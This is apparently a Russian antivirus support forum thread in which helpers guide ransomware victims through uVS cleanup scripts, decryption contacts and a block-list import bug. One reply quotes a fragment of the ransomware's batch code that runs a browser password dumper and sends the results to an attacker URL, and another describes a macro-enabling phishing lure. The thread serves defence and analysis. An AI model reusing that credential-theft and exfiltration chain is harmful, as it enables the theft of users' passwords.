ZloyDi,
добавил в текстовый файл еще одну строку
*себастьян.янке.рф/*
и получил после импорта в блокирующем списке запись (как я и ожидал)
*../*

Владимир,
повторный образ не нужен.

Владимир Исаков,
по очистке системы выполните скрипт в uVS
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v3.86.4 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE
;------------------------autoscript---------------------------

chklst
delvir

delref %SystemDrive%\PROGRAM FILES\EXPLORE.EXE

deltmp
delnfr
;-------------------------------------------------------------

restart
[/code]
перезагрузка, пишем о старых и новых проблемах.
------------
2. по расшифровке документов напишите в [email protected] при наличие лицензии на антивирус.

3. по восстановлению документов напишите в почту [email protected]

Дмитрий Федоров,
конечно тащит.
[QUOTE]
                                **********************************************
                                         Browser Password Recovery Report
                                **********************************************

____________________________________________________________­___________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com


[/QUOTE]

из тела энкодера запускается утилита для поиска паролей в браузерах.
найденные пароли будут отправлены на сайт злоумышленников.

фрагмент кода:

[QUOTE]if exist 065ed39e.exe (
"%temp%\065ed39e.exe" -f "%temp%\6eb7832c.a238703f"
wscript.exe //B //Nologo //T:120 "%temp%\3c2901e8.vbs" "%temp%\6eb7832c.a238703f" хттп://attached-email.com/v.php pf
del /f /q 065ed39e.exe
)[/QUOTE]

1. по образу все чисто. нет шифратора в автозапуске.

2. по расшифровке документов напишите в [email protected] при наличие лицензии на антивирус.

3. по восстановлению документов напишите в почту [email protected]

Ольга Белоусова,
теперь все правильно.

по очистке системы выполните:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v3.86.4 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE
delall %SystemDrive%\PROGRAM FILES (X86)\TENCENT\QQMUSIC\QQMUSIC1203.9.58.17\IEBACK.BAT
delall %SystemDrive%\PROGRAM FILES (X86)\TENCENT\QQMUSIC\QQMUSIC1203.9.58.17\JSREGISTER.BAT
delall D:\PROGRAM FILES (X86)\TENCENT\QQPCMGR\10.9.16345.222\PLUGINS\FILESMASH\QMSOFTEXT64.DLL
delall %SystemDrive%\PROGRAMDATA\VKSAVER\VKSAVER.EXE
delref HTTP://WWW.HAO123.COM/?TN=91800134_HAO_PG
deltmp
delnfr
delref %SystemDrive%\USERS\ЛЮБА\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\JHCDLKGJIEHGPNPOLKBNMPFFJODIGBKB\0.2.0_0\JOXI СДЕЛАЙ СКРИНШОТ ЭКРАНА
delref %SystemDrive%\USERS\ЛЮБА\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\GIGHMMPIOBKLFEPJOCNAMGKKBIGLIDOM\2.36.2_0\ADBLOCK
restart
[/code]
перезагрузка, пишем о старых и новых проблемах.
------------

по восстановлению документов написал вам в почту.

Константин Гончаров,
ответил в почту.
опыт показывает за последние полтора года, что пост_реакция часто не успевает за новым ходом мошенников, потому надо  перестраивать работу в направлении реализации превентивных мер: настройка локальных политик, создание правил ХИПС, регулярного создания архивных и теневых копий документов, доведения до пользователей меры опасности при работе в сети с электронной почтой и браузерами.

новый ход мошенников:
в качестве вложения офисный документ, предлагают по сути понизить уровень безопасности в Офисе, с тем чтобы автоматически были запущены макросы, добавленные в документ.

Акт сверки - 27.08.2015 - Подтвердите правильность данных

содержимое документа.

[IMG WIDTH=653 HEIGHT=800]http://s018.radikal.ru/i527/1508/67/56939f259928.jpg[/IMG]

кстати,  в 6.2 еще и импорт кривой из файлов в блок-листы URL
вместо адреса *янке.рф/*     добавляетcя строка *./*

теперь добавьте новый образ автозапуска.